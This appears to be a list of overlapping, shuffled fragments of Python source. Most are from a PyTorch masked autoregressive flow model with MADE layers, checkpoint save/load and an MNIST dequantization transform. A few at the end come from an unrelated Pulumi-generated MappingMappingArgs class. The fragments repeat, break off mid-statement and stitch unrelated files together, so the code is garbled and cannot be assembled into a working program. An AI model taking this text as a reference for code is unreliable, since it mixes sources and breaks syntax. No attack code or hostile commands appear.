"\\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1.,",
"= inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] !=",
"== 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\",
"= self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path):",
"image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image",
"ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)]",
"torchvision.transforms as T from .MADE import MADE from .Shuffle import Shuffle from .Flow",
"with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x",
"conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ =",
"x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self,",
"T from .MADE import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow",
"logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim])",
"True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape =",
"self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\"",
"= SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for",
"save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict",
"self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\":",
"condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim,",
"device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs,",
"Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import",
"__init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01",
"\"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device)",
"self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image)",
"inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and",
"= conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions)",
"raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) -",
"_ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\":",
"import torch import torch.nn as nn import torchvision.transforms as T from .MADE import",
"state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a",
"= torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a +",
"import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import",
"self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), },",
"path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input",
"(torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha",
"self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0.,",
".Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class",
"__call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image",
"import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim,",
"= self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image +",
"= device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim),",
"}, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform",
"def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.)",
"flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim",
"0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ +",
"\\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]],",
"self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions):",
"inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized =",
"= T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image):",
"conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path)",
"from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log",
"return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z =",
"self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1 - 2a)",
"MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha",
"with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return",
"condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized =",
"torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError",
"conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if",
"SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def",
"torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self,",
"NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions",
"not self.initialized and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs,",
"utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF,",
"T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image =",
"condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks",
"* image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset",
"= inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized",
"from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self,",
"in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform",
"torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path,",
"\"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(),",
"if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise",
"ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim,",
"logit(a + (1 - 2a) * image) as in paper \"\"\" class MAFImageTransform():",
"torch.nn as nn import torchvision.transforms as T from .MADE import MADE from .Shuffle",
"conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack",
"RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks,",
"super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device =",
"def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions =",
"conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def",
"= conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack todo",
"dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) *",
"= True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape",
"def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to",
"input logit(a + (1 - 2a) * image) as in paper \"\"\" class",
"1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z,",
"in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior",
"image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 *",
"- 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0.,",
"def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim",
"num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim",
"[[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized",
"import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger",
"self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({",
"as T from .MADE import MADE from .Shuffle import Shuffle from .Flow import",
"in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not",
"to dequantize input logit(a + (1 - 2a) * image) as in paper",
"device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device",
"(1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2",
"as nn import torchvision.transforms as T from .MADE import MADE from .Shuffle import",
"\"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"])",
"\"\"\" uniform noise to dequantize input logit(a + (1 - 2a) * image)",
"hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks -",
"self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"])",
"False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def",
"if not self.initialized and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad():",
"image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset ==",
"from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device):",
"!= 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True",
"z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self,",
"2a) * image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if",
"[])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self,",
"self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs,",
"todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs,",
"z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size,",
"self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model",
"raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim)",
"0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise =",
"0.5) * (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1",
"= (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 * self.alpha)",
"Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim,",
"T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image",
"= self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with",
".MADE import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions",
"hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim =",
"self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1])",
"logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0]",
"map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1 -",
"* (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 -",
"__init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim =",
"import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__()",
"- 2a) * image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset):",
".Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from",
"self.initialized and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions)",
"import torchvision.transforms as T from .MADE import MADE from .Shuffle import Shuffle from",
"calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs",
"= condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim,",
"from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d",
"ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim,",
"1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device),",
"(image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 * self.alpha) *",
"import torch.nn as nn import torchvision.transforms as T from .MADE import MADE from",
"device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def",
"inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs =",
"AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5)",
"ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device)",
"inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0]",
"path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise",
"+ noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 * self.alpha) * image)",
"z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size =",
"\"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def",
"hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0),",
"True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size",
"self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions):",
"[[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in",
"class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim =",
"dequantize input logit(a + (1 - 2a) * image) as in paper \"\"\"",
"# hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac",
"image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image =",
"inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim)",
"torch import torch.nn as nn import torchvision.transforms as T from .MADE import MADE",
"self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad():",
"paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform =",
"sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _",
"SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind",
"MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm,",
"range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior =",
"self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1 - 2a) *",
"self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self,",
"forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0],",
"MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim",
"= flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model =",
"as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\":",
"hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True",
"= hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind ==",
"condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim",
"self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim),",
"conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1,",
"inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1:",
".NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim,",
"conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z",
"def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x,",
"x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(),",
"def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path):",
"load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize",
"log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim",
"+ (1 - 2a) * image) as in paper \"\"\" class MAFImageTransform(): def",
"flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum(",
"self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind",
"conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return",
"fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions)",
"path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict =",
"(1 - 2a) * image) as in paper \"\"\" class MAFImageTransform(): def __init__(self,",
"= self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(),",
"+ [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device))",
"self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device",
"nn import torchvision.transforms as T from .MADE import MADE from .Shuffle import Shuffle",
"conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack todo fix?",
"self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: #",
"from .MADE import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from",
"uniform noise to dequantize input logit(a + (1 - 2a) * image) as",
"self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\",
"noise to dequantize input logit(a + (1 - 2a) * image) as in",
"class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()])",
"self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack todo fix? with",
"and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized",
"self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self,",
"self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim,",
"dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else:",
"= 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise",
"noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0., 1.)",
"== \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\")",
"import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module):",
"torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1",
"return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def",
"device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))]",
"RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim,",
"= True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions):"
] |
[
"pulumi.runtime from typing import Any, Dict, List, Mapping, Optional, Tuple, Union from ..",
"\"expression\", expression) pulumi.set(__self__, \"id\", id) if push_status is not None: pulumi.set(__self__, \"push_status\", push_status)",
"__init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression)",
"typing import Any, Dict, List, Mapping, Optional, Tuple, Union from .. import _utilities,",
"the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by",
"MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__,",
"not edit by hand unless you're certain you know what you are doing!",
"expression) pulumi.set(__self__, \"id\", id) if push_status is not None: pulumi.set(__self__, \"push_status\", push_status) @property",
"Do not edit by hand unless you're certain you know what you are",
"import warnings import pulumi import pulumi.runtime from typing import Any, Dict, List, Mapping,",
"Mapping, Optional, Tuple, Union from .. import _utilities, _tables __all__ = [ 'MappingMappingArgs',",
"return pulumi.get(self, \"expression\") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter",
"are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any,",
"generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not",
"WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***",
"_tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression:",
"*** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool.",
"@pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter def push_status(self, value: Optional[pulumi.Input[str]]):",
"pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\")",
"by hand unless you're certain you know what you are doing! *** import",
"Any, Dict, List, Mapping, Optional, Tuple, Union from .. import _utilities, _tables __all__",
"push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter def push_status(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, \"push_status\",",
"expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter def id(self) -> pulumi.Input[str]: return",
